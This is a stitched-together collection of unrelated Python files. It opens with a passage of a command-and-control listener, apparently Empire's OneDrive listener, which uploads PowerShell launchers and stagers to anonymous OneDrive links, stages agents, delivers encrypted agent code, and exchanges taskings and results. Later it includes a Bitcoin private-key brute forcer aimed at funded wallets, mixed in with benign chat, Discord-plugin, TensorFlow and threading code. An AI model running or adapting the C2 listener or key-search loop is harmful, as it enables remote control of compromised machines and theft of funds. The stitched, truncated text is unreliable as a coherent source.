params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder}
base_object = s.post("%s/drive/items/root/children" % base_url, json=params)
else:
message = "[*] {} folder already exists".format(base_folder)
signal = json.dumps({
'print' : True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
for item in [staging_folder, taskings_folder, results_folder]:
item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item))
if not (item_object.status_code == 200):
print helpers.color("[*] Creating %s/%s folder" % (base_folder, item))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item}
item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']), json=params)
else:
message = "[*] {}/{} already exists".format(base_folder, item)
signal = json.dumps({
'print' : True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
def upload_launcher():
ps_launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=False, userAgent='none', proxy='none', proxyCreds='none')
r = s.put("%s/drive/root:/%s/%s/%s:/content" %(base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
data=ps_launcher, headers={"Content-Type": "text/plain"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
def upload_stager():
ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell', token=token['access_token'])
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
data=ps_stager, headers={"Content-Type": "application/octet-stream"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
#Different domain for some reason?
self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
else:
print helpers.color("[!] Something went wrong uploading stager")
message = r.content
signal = json.dumps({
'print' : True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
listener_options = copy.deepcopy(listenerOptions)
listener_name = listener_options['Name']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
client_id = listener_options['ClientID']['Value']
client_secret = listener_options['ClientSecret']['Value']
auth_code = listener_options['AuthCode']['Value']
refresh_token = listener_options['RefreshToken']['Value']
base_folder = listener_options['BaseFolder']['Value']
staging_folder = listener_options['StagingFolder']['Value'].strip('/')
taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
results_folder = listener_options['ResultsFolder']['Value'].strip('/')
redirect_uri = listener_options['RedirectURI']['Value']
base_url = "https://graph.microsoft.com/v1.0"
s = Session()
if refresh_token:
token = renew_token(client_id, client_secret, refresh_token)
message = "[*] Refreshed auth token"
signal = json.dumps({
'print' : True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
else:
token = get_token(client_id, client_secret, auth_code)
message = "[*] Got new auth token"
signal = json.dumps({
'print' : True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive")
s.headers['Authorization'] = "Bearer " + token['access_token']
setup_folders()
while True:
#Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
try:
if listener_name in self.mainMenu.listeners.activeListeners.keys():
upload_stager()
upload_launcher()
break
else:
time.sleep(1)
except AttributeError:
time.sleep(1)
while True:
time.sleep(int(poll_interval))
try: #Wrap the whole loop in a try/catch so one error won't kill the listener
if time.time() > token['expires_at']: #Get a new token if the current one has expired
token = renew_token(client_id, client_secret, token['refresh_token'])
s.headers['Authorization'] = "Bearer " + token['access_token']
message = "[*] Refreshed auth token"
signal = json.dumps({
'print' : True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
upload_stager()
if token['update']:
self.mainMenu.listeners.update_listener_options(listener_name, "RefreshToken", token['refresh_token'])
token['update'] = False
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder))
for item in search.json()['children']: #Iterate all items in the staging folder
try:
reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name'])
if not reg:
continue
agent_name, stage = reg.groups()
if stage == '1': #Download stage 1, upload stage 2
message = "[*] Downloading {}/{}/{} {}".format(base_folder, staging_folder, item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder, agent_name, str(len(return_val)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=return_val)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
if stage == '3': #Download stage 3, upload stage 4 (full agent code)
message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder, item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
agent_token = renew_token(client_id, client_secret, token['refresh_token']) #Get auth and refresh tokens for the agent to use
agent_code = str(self.generate_agent(listener_options, client_id, client_secret, agent_token['access_token'],
agent_token['refresh_token'], redirect_uri, lang))
enc_code = encryption.aes_encrypt_then_hmac(session_key, agent_code)
message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(base_folder, staging_folder, agent_name, str(len(enc_code)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=enc_code)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception, e:
print helpers.color("[!] Could not handle agent staging for listener %s, continuing" % listener_name)
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)
for agent_id in agent_ids: #Upload any tasks for the current agents
task_data = self.mainMenu.agents.handle_agent_request(agent_id, 'powershell', staging_key, update_lastseen=False)
if task_data:
try:
r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id))
if r.status_code == 200: # If there's already something there, download and append the new data
task_data = r.content + task_data
message = "[*] Uploading agent tasks for {}, {} bytes".format(agent_id, str(len(task_data)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id), data = task_data)
except Exception, e:
message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder))
for item in search.json()['children']: #For each file in the results folder
try:
agent_id = item['name'].split(".")[0]
if not agent_id in agent_ids: #If we don't recognize that agent, upload a message to restage
print helpers.color("[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name']))
s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id), data = "RESTAGE")
s.delete("%s/drive/items/%s" % (base_url, item['id']))
continue
try: #Update the agent's last seen time, from the file timestamp
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ")
except: #sometimes no ms for some reason...
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ")
seen_time = helpers.utc_to_local(seen_time)
self.mainMenu.agents.update_agent_lastseen_db(agent_id, seen_time)
#If the agent is just checking in, the file will only be 1 byte, so no results to fetch
if(item['size'] > 1):
message = "[*] Downloading results from {}/{}, {} bytes".format(results_folder, item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.get(item['@microsoft.graph.downloadUrl'])
self.mainMenu.agents.handle_agent_data(staging_key, r.content, listener_options, update_lastseen=False)
message = "[*] Deleting {}/{}".format(results_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception, e:
message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
except Exception, e:
print helpers.color("[!] Something happened in listener %s: %s, continuing" % (listener_name, e))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.close()
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
main.py | import sys
from threading import Thread
from connection import TcpConnection
from proto.tcp_packet_pb2 import TcpPacket
class Chat():
def __init__(self):
self.connection = TcpConnection()
self.packet = TcpPacket()
def createLobby(self, maxPlayers, *args):
payload = self.packet.CreateLobbyPacket()
payload.type = self.packet.CREATE_LOBBY
payload.max_players = maxPlayers
if len(args) > 2:
payload.lobby_id = args[2]
lobby = self.connection.send(payload)
payload.ParseFromString(lobby)
return payload.lobby_id
def connect(self, id, *args):
payload = self.packet.ConnectPacket()
payload.type = self.packet.CONNECT
payload.lobby_id = id
payload.player.name = args[0] if args else 'anon'
self.user = payload.player
self.lobby = payload.lobby_id
lobby = self.connection.send(payload)
self.packet.ParseFromString(lobby)
if self.packet.type == self.packet.CONNECT:
payload.ParseFromString(lobby)
return payload.lobby_id
elif self.packet.type == self.packet.ERR_LDNE:
payload = self.packet.ErrLdnePacket()
payload.ParseFromString(lobby)
print(payload.err_message)
sys.exit(1)
elif self.packet.type == self.packet.ERR_LFULL:
payload = self.packet.ErrLfullPacket()
payload.ParseFromString(lobby)
print(payload.err_message)
sys.exit(1)
def listen(self, receiveCallback):
self.receiveCallback = receiveCallback
self.stream = Thread(target=self.connection.receive, args=[self._parsePacket])
self.stream.start()
def sendChat(self, message):
payload = self.packet.ChatPacket()
payload.type = self.packet.CHAT
payload.message = message
payload.player.name = self.user.name
payload.lobby_id = self.lobby
return payload
def getPlayerList(self):
payload = self.packet.PlayerListPacket()
payload.type = self.packet.PLAYER_LIST
return payload
def disconnect(self):
payload = self.packet.DisconnectPacket()
payload.type = self.packet.DISCONNECT
payload.player.name = self.user.name
payload.player.id = self.user.id
self.connection.asyncsend(payload)
self.connection.close()
def _parse(type, packet):
data = type()
data.ParseFromString(packet)
return data
def _parsePacket(self, data):
self.packet.ParseFromString(data)
if self.packet.type == self.packet.DISCONNECT:
data = Chat._parse(self.packet.DisconnectPacket, data)
self.receiveCallback('\n<', color='RED')
self.receiveCallback(data.player.name)
self.receiveCallback('> has left the chat room>\n\n', color='RED')
elif self.packet.type == self.packet.CONNECT:
data = Chat._parse(self.packet.ConnectPacket, data)
self.receiveCallback('\n<', color='GREEN')
self.receiveCallback(data.player.name)
self.receiveCallback('> has joined the chat>\n\n', color='GREEN')
elif self.packet.type == self.packet.CHAT:
data = Chat._parse(self.packet.ChatPacket, data)
self.receiveCallback(data.player.name + ': ', color='YELLOW')
self.receiveCallback(data.message + '\n')
elif self.packet.type == self.packet.PLAYER_LIST:
data = Chat._parse(self.packet.PlayerListPacket, data)
self.receiveCallback('\n[PLAYER LIST]\n', color='GREEN')
for player in data.player_list:
self.receiveCallback('> {}@{}\n'.format(player.name, player.id))
self.receiveCallback('\n')
def _encode(self, stdin):
if stdin == '^players':
data = self.getPlayerList()
else:
data = self.sendChat(stdin)
return data
|
plugin.py | """
Plugin is the definition of the plugin interface class as well as extensible utility interfaces
that can be used to create Plugins quickly and easily.
Plugin is designed to be similar to Command and Reaction interface classes while being more versatile.
@author: NGnius
"""
import asyncio, time, traceback
from multiprocessing import Process, Queue
from libs import dataloader, addon
# general plugin constants
PERIOD = 'period'
DEFAULT = addon.DEFAULT
# threaded constants
THREADED_PERIOD = 'threadedperiod'
END_PROCESS = 'endprocess'
# threaded process ending constants
JOIN = 'join'
TERMINATE = 'terminate'
KILL = 'kill' # new in 3.7, do not use
NONE = None
CUSTOM = None
# args constants
ARGS = 'args'
KWARGS = 'kwargs'
class Plugin(addon.AddOn):
'''Plugin represents a plugin that the discord bot can work alongside
to add custom functionality not present in the base bot'''
def __init__(self, api_methods=dict(), config=None, events=dict(), namespace=None, **kwargs):
'''(Plugin, dict, str, dict) -> Plugin
api_methods: a dict of api methods accessible to the Plugin, so that most plugins don't have to be AdminPlugins
kwargs: included to simplify sub-classing'''
self.shutting_down = False
if config:
try:
self.config = dataloader.datafile(config) # configuration file for the Plugin
if self.config.type=='config':
self.config=self.config.content[self.DEFAULT]
except FileNotFoundError:
self.config = None # NOTE: This is a bad state for a Plugin to be in, since it may cause unexpected errors
raise ImportError("No config file found")
else:
raise ImportError("Config file cannot be None")
self.period = float(self.config[PERIOD]) # period for each repetition of action()
self.send_message = api_methods[self.SEND_MESSAGE]
self.edit_message = api_methods[self.EDIT_MESSAGE]
self.add_reaction = api_methods[self.ADD_REACTION]
self.remove_reaction = api_methods[self.REMOVE_REACTION]
self.send_typing = api_methods[self.SEND_TYPING]
self.send_file = api_methods[self.SEND_FILE]
self.events = events
self.public_namespace = namespace
async def _action(self):
'''(Plugin) -> None
Concrete implementations should NOT override this function. Only sub-classes should override this,
in order to expand or modify it's functionality.
the looping async method to call action()'''
while not self.shutting_down and self.period!=-1:
start_time = time.perf_counter()
try:
await self.action()
except Exception as e: # catch any exception that could crash the task
# traceback.print_exc()
self._on_action_error(e)
sleep_time = self.period - (time.perf_counter() - start_time)
if sleep_time<0:
sleep_time=0
await asyncio.sleep(sleep_time) # account for execution time of self.action() in asyncio.sleep()
async def action(self):
'''(Plugin) -> None
the method to be run alongside the discord bot
This will be looped externally'''
pass
def _shutdown(self):
'''(Plugin) -> None
Concrete implementations should NOT override this function. Only sub-classes should override this,
in order to expand or modify it's functionality.
the method to call shutdown()'''
self.shutting_down=True
self.shutdown()
def shutdown(self):
'''(Plugin) -> None
called during bot shutdown/logout
Use this to save any information that needs to be kept for the next time the bot starts up'''
pass
def _on_action_error(self, error):
'''(Plugin, Exception) -> None
Concrete implementations should not override this function.
the method to call on_action_error() '''
self.on_action_error(error)
def on_action_error(self, error):
''' (Plugin, Exception) -> None
Called when action() raises an exception
Use this to handle error reporting or exceptional cases'''
pass
class ThreadedPlugin(Plugin):
'''ThreadedPlugin is an extension of the Plugin interface for an independent task to run in another thread.
This is quite useful for scrapers and other slow tasks that block the main thread and don't require access to bot variables'''
def spawn_process(self):
self.process = Process(target = self._threaded_action, args = (self.queue, ), kwargs = self.threaded_kwargs) # secondary thread
self.process.start()
def __init__(self, should_spawn_thread=True,**kwargs):
'''(ThreadedPlugin, dict) -> ThreadedPlugin'''
super().__init__(**kwargs)
self.end_process = self.config[END_PROCESS] # method of ending process. Valid options are 'join', 'terminate' and 'kill' (Python3.7+ only for kill)
self.threaded_period = float(self.config[THREADED_PERIOD]) # like self.period, except for for the threaded action
self.queue = Queue() # queue object for sending information to and from the ThreadedPlugin's secondary thread
try: # ensure threaded_kwargs exists, but don't overwrite
self.threaded_kwargs
except AttributeError:
self.threaded_kwargs = dict()
# please note that ThreadedPlugin will create a copy of all variables
# for the new thread, unless they're compatible with multiple threads
if should_spawn_thread:
self.spawn_process()
def _shutdown(self):
'''(ThreadedPlugin) -> None
Exits the secondary thread and does everything Plugin's _shutdown() does'''
super()._shutdown()
if self.process.is_alive():
if self.end_process == JOIN:
self.process.join()
elif self.end_process == TERMINATE:
self.process.terminate()
elif self.end_process == KILL:
self.process.kill()
elif self.end_process == NONE or self.end_process == CUSTOM:
pass # assume user has defined shutdown() and it has already handled ending the thread
self.process.join() # wait for process ot terminate, indefinitely if necessary
def _threaded_action(self, queue, **kwargs):
'''(ThreadedPlugin, Queue, dict) -> None
Concrete implementations should NOT override this function. Only sub-classes should override this,
in order to expand or modify it's functionality.
Similar to _action(), the looping thread that calls threaded_action'''
while not self.shutting_down and self.threaded_period!=-1:
start_time = time.perf_counter()
try:
self.threaded_action(queue, **kwargs)
except: # catch anything that could crash the thread
traceback.print_exc()
pass
sleep_time = self.threaded_period - (time.perf_counter() - start_time)
if sleep_time<0:
sleep_time=0
time.sleep(sleep_time) # account for execution time of self.action() in asyncio.sleep()
def threaded_action(self, queue, **kwargs):
'''(ThreadedPlugin, Queue, dict) -> None
the method to be run in the secondary thread
This will be looped externally'''
pass
async def action(self):
'''(ThreadedPlugin) -> None
A standard action method to interpret dictionaries in queue
This method uses the standard plugin constants (SEMD_MESSAGE, EDIT_MESSAGE, etc.)
to interpret dictionaries to use the discord API to do the appropriate actions.
Use a dictionary, with the appropriate keys, associated to the API action
to send parameters to the API function (send_message(**kwargs), edit_message(**kwargs), etc.).
The keys are the same as the API parameters.
this method overrides Plugin's action method'''
while not self.queue.empty():
action_dict = self.queue.get() # hopefully it's a dict object
if isinstance(action_dict, dict): # make sure it's a dict object
for key in action_dict:
if ARGS not in action_dict[key]:
action_dict[key][ARGS]=[]
if KWARGS not in action_dict[key]:
action_dict[key][KWARGS]={}
if key==self.SEND_MESSAGE:
try:
await self.send_message(*action_dict[key][ARGS], **action_dict[key][KWARGS])
except TypeError:
# TypeError is raised when missing arguments
# or when action_dict[key] is not mapping
# (ie **action_dict[key] is not a valid operation)
pass
elif key==self.EDIT_MESSAGE:
try:
await self.edit_message(*action_dict[key][ARGS], **action_dict[key][KWARGS])
except TypeError:
# TypeError is raised when missing arguments
# or when action_dict[key] is not mapping
# (ie **action_dict[key] is not a valid operation)
pass
elif key==self.ADD_REACTION:
try:
await self.add_reaction(*action_dict[key][ARGS], **action_dict[key][KWARGS])
except TypeError:
# TypeError is raised when missing arguments
# or when action_dict[key] is not mapping
# (ie **action_dict[key] is not a valid operation)
pass
elif key==self.REMOVE_REACTION:
try:
await self.remove_reaction(*action_dict[key][ARGS], **action_dict[key][KWARGS])
except TypeError:
# TypeError is raised when missing arguments
# or when action_dict[key] is not mapping
# (ie **action_dict[key] is not a valid operation)
pass
elif key==self.SEND_TYPING:
try:
await self.send_typing(*action_dict[key][ARGS], **action_dict[key][KWARGS])
except TypeError:
# TypeError is raised when missing arguments
# or when action_dict[key] is not mapping
# (ie **action_dict[key] is not a valid operation)
pass
elif key==self.SEND_FILE:
try:
await self.send_file(*action_dict[key][ARGS], **action_dict[key][KWARGS])
except TypeError:
# TypeError is raised when missing arguments
# or when action_dict[key] is not mapping
# (ie **action_dict[key] is not a valid operation)
pass
class OnReadyPlugin(Plugin):
async def _action(self):
await self.events[self.READY]()
await super()._action()
class OnLoginPlugin(Plugin):
async def _action(self):
await self.events[self.LOGIN]()
await super()._action()
class OnMessagePlugin(Plugin):
async def _action(self):
while not self.shutting_down:
message = await self.events[self.MESSAGE]() # this is the difference
start_time = time.perf_counter()
await self.action(message)
await asyncio.sleep(self.period - (time.perf_counter() - start_time)) # account for execution time of self.action() in asyncio.sleep()
def action(self, message):
pass
class OnReactionPlugin(Plugin):
async def _action(self):
while not self.shutting_down:
reaction, user = await self.events[self.REACTION]() # this is the difference
start_time = time.perf_counter()
await self.action(reaction, user)
await asyncio.sleep(self.period - (time.perf_counter() - start_time)) # account for execution time of self.action() in asyncio.sleep()
def action(self, reaction, user):
pass
class AdminPlugin(Plugin):
'''Similar to a regular Plugin, but has access to the client/bot's class.
This is a security risk, yay! Use wisely and sparingly '''
def add_client_variable(self, client_var):
self.client = self.bot = client_var
self._on_client_add()
def _on_client_add(self):
'''() -> None
wrapper for on_client_add method '''
self.on_client_add()
def on_client_add(self):
'''() -> None
A method called when the bot client variable is passed to the AdminPlugin.
This is always called after the plugin is initialized but before the action() task is created.
This may be useful for overriding bot variables or methods instead
of directly and permanently modifying the bot.py file'''
pass
|
example.py | import tensorflow as tf
from multiprocessing import Process, Queue
from time import sleep
import model
import numpy as np
def generate_noised_data(size=1000):
t = np.arange(start=0.0, stop=2*np.pi, step=size)
noise = np.random.random(size=size) * 0.1
x = np.sin(t)
y = x + noise
x = np.expand_dims(x, axis=-1)
y = np.expand_dims(y, axis=-1)
return x, y
def update_target_graph(source, target):
"""
Copies values from one tf.graph() to another
Useful for setting worker network parameters equal to global network.
:param source: str()
:param target: str()
:return: tf.operation
"""
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=source)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=target)
assert from_vars, 'update_target_graph: from_vars is an empty list, source={}'.format(source)
assert to_vars, 'update_target_graph: to_vars is an empty list, target={}'.format(target)
op_holder = []
for from_var, to_var in zip(from_vars, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
class Actor:
def __init__(self, scope='actor'):
self.scope = scope
self.session = None
with tf.variable_scope(scope):
self.data_ph = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='data_ph')
self.labels_ph = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='labels_ph')
self.logits = model.build_mlp_graph(self.data_ph, layers=(128, 128))
def train(self, x, y):
raise NotImplementedError
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.scope)
def predict(self, x):
if self.session is None:
self.session = tf.get_default_session()
logits = self.session.run(self.logits,
feed_dict={self.data_ph: x})
return logits
class Learner(Actor):
def __init__(self, scope='learner'):
super().__init__(scope=scope)
with tf.variable_scope(scope):
self.global_step = tf.train.create_global_step()
self.loss = tf.losses.mean_squared_error(labels=self.labels_ph, predictions=self.logits)
self.optimizer = tf.train.AdamOptimizer(learning_rate=5.0e-4)
# params = tf.trainable_variables()
# build gradients except for old policy nodes
self.train_op = self.optimizer.minimize(self.loss) # , global_step=self.global_step)
def train(self, x, y):
if self.session is None:
self.session = tf.get_default_session()
train_loss, _ = self.session.run([self.loss, self.train_op],
feed_dict={self.data_ph: x, self.labels_ph: y})
return train_loss
def learner(shared_job_device, queue):
# Note:
# the learner should be placed on a GPU for performance boost
with tf.device(shared_job_device):
learner = Learner()
server = tf.train.Server(cluster,
job_name="learner",
task_index=0)
max_steps = 10000
with tf.Session(target=server.target) as sess:
print("Parameter server: initializing variables...")
print(tf.trainable_variables())
sess.run(tf.global_variables_initializer())
global_step = 0
while global_step < max_steps:
x, y = queue.get()
# x, y = data
loss = learner.train(x, y)
if global_step % 1000 == 0:
print('Loss =', loss)
global_step += 1
# print('new params:')
# learner.get_values()
# train_loss, _ = sess.run([loss, train_op],
# feed_dict={data_ph: x, labels_ph: y})
# print("Parameter server: var has value %.1f" % val)
# sleep(1.0)
print("Learner: request join...")
server.join()
def actor(worker_n, shared_job_device, queue):
local_job_device = '/job:worker/task:{}'.format(worker_n)
with tf.device(local_job_device):
actor = Actor()
with tf.device(shared_job_device):
learner = Learner()
update_local_vars = update_target_graph(source='learner', target='actor')
# start
server = tf.train.Server(cluster,
job_name="worker",
task_index=worker_n)
with tf.Session(target=server.target) as sess:
# print('worker ({}) fetches values'.format(worker_n))
print('worker: run global init, session:', sess)
sess.run(tf.global_variables_initializer())
# print("Worker %d: waiting for cluster connection..." % worker_n)
# sess.run(tf.report_uninitialized_variables())
# print("Worker %d: cluster ready!" % worker_n)
# print(tf.report_uninitialized_variables())
# while sess.run(tf.report_uninitialized_variables()):
# print("Worker %d: waiting for variable initialization..." % worker_n)
# sleep(1.0)
# print("Worker %d: variables initialized" % worker_n)
for i in range(5):
print('worker ({}) fetches values'.format(worker_n))
sess.run(update_local_vars)
data = np.array([[np.pi]])
print(actor.predict(x=data))
# produce data
for _ in range(1000):
x, y = generate_noised_data()
data = (x, y)
queue.put(data)
# sess.run(var_shared.assign_add(1.0))
# print("Worker %d: copy shared var" % worker_n)
sleep(0.2)
# print('worker ({}): END var_local = {}'.format(worker_n, var_local.eval()))
print("Worker ({}) requests join".format(worker_n))
server.join()
if __name__ == '__main__':
workers = ['localhost:{}'.format(3001 + i) for i in range(3)]
jobname = 'impala'
cluster = tf.train.ClusterSpec({
"worker": workers,
"learner": ["localhost:3000"]
})
print(cluster)
shared_job_device = '/job:learner/task:0'
queue = Queue(maxsize=100)
processes = [Process(target=learner, args=(shared_job_device, queue), daemon=True)] # add parameter server
for w in range(len(workers)): # create worker processes
processes.append(Process(target=actor, args=(w, shared_job_device, queue), daemon=True))
sleep(0.1)
for p in processes:
p.start()
sleep(20)
for p in processes:
p.terminate() |
thread.py | # curio/thread.py
#
# Not your parent's threading
__all__ = [ 'AWAIT', 'async_thread', 'async_context', 'async_iter', 'AsyncThread', 'is_async_thread' ]
# -- Standard Library
import threading
from concurrent.futures import Future
from functools import wraps
from inspect import iscoroutine
# -- Curio
from . import sync
from .task import spawn, disable_cancellation
from .traps import _future_wait
from . import errors
_locals = threading.local()
class AsyncThread(object):
def __init__(self, target, args=(), kwargs={}, daemon=False):
self.target = target
self.args = args
self.kwargs = kwargs
self.daemon = daemon
self._request = Future()
self._done_evt = threading.Event()
self._terminate_evt = sync.UniversalEvent()
self._coro = None
self._result_value = None
self._result_exc = None
self._thread = None
self._task = None
async def _coro_runner(self):
while True:
# Wait for a hand-off
await disable_cancellation(_future_wait(self._request))
self._coro = self._request.result()
self._request = Future()
# If no coroutine, we're shutting down
if not self._coro:
break
# Run the the coroutine
try:
self._result_value = await self._coro
self._result_exc = None
except BaseException as e:
self._result_value = None
self._result_exc = e
# Hand it back to the thread
self._done_evt.set()
await self._terminate_evt.set()
def _func_runner(self):
_locals.thread = self
try:
self._result_value = self.target(*self.args, **self.kwargs)
self._result_exc = None
except BaseException as e:
self._result_value = None
self._result_exc = e
self._request.set_result(None)
self._terminate_evt.set()
async def start(self):
self._task = await spawn(self._coro_runner, daemon=True)
self._thread = threading.Thread(target=self._func_runner, daemon=True)
self._thread.start()
def AWAIT(self, coro):
self._request.set_result(coro)
self._done_evt.wait()
self._done_evt.clear()
if self._result_exc:
raise self._result_exc
else:
return self._result_value
async def join(self):
await self._terminate_evt.wait()
if self._result_exc:
raise errors.TaskError() from self._result_exc
else:
return self._result_value
async def cancel(self):
await self._task.cancel()
def AWAIT(coro):
'''
Await for a coroutine in an asynchronous thread. If coro is
not a proper coroutine, this function acts a no-op, returning coro.
'''
if not iscoroutine(coro):
return coro
if hasattr(_locals, 'thread'):
return _locals.thread.AWAIT(coro)
else:
raise errors.AsyncOnlyError('Must be used as async')
def async_thread(func=None, *, daemon=False):
if func is None:
return lambda func: async_thread(func, daemon=daemon)
@wraps(func)
async def runner(*args, **kwargs):
t = AsyncThread(func, args=args, kwargs=kwargs, daemon=daemon)
await t.start()
try:
return await t.join()
except errors.CancelledError as e:
await t.cancel()
raise
except errors.TaskError as e:
raise e.__cause__ from None
return runner
def is_async_thread():
return hasattr(_locals, 'thread')
|
run_flood.py | # Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
import os
import multiprocessing
import plutus
import newKeyGen
import hashIterator
def main(database):
print('Working...')
baseHash = os.urandom(32)
incrementing = bytearray(baseHash)
decrementing = bytearray(baseHash)
while True:
inc_key = newKeyGen.keygen(incrementing.hex())
plutus.process(inc_key[0], inc_key[2], inc_key[3], database)
plutus.process(inc_key[0], inc_key[2], inc_key[4], database)
dec_key = newKeyGen.keygen(decrementing.hex())
plutus.process(dec_key[0], dec_key[2], dec_key[3], database)
plutus.process(dec_key[0], dec_key[2], dec_key[4], database)
hashIterator.changeHash(incrementing, 1)
hashIterator.changeHash(decrementing, -1)
# hashIterator.decimal_print(incrementing)
# hashIterator.decimal_print(decrementing)
if __name__ == '__main__':
database = plutus.read_database()
# for cpu in range(multiprocessing.cpu_count()):
# for cpu in range(1):
# multiprocessing.Process(target=main, args=(database, )).start()
main(database) |
record_tape.py | import os, csv, threading, time
class RecordTape(object):
def __init__(self,
real_exit,
save_dir,
region,
image_box,
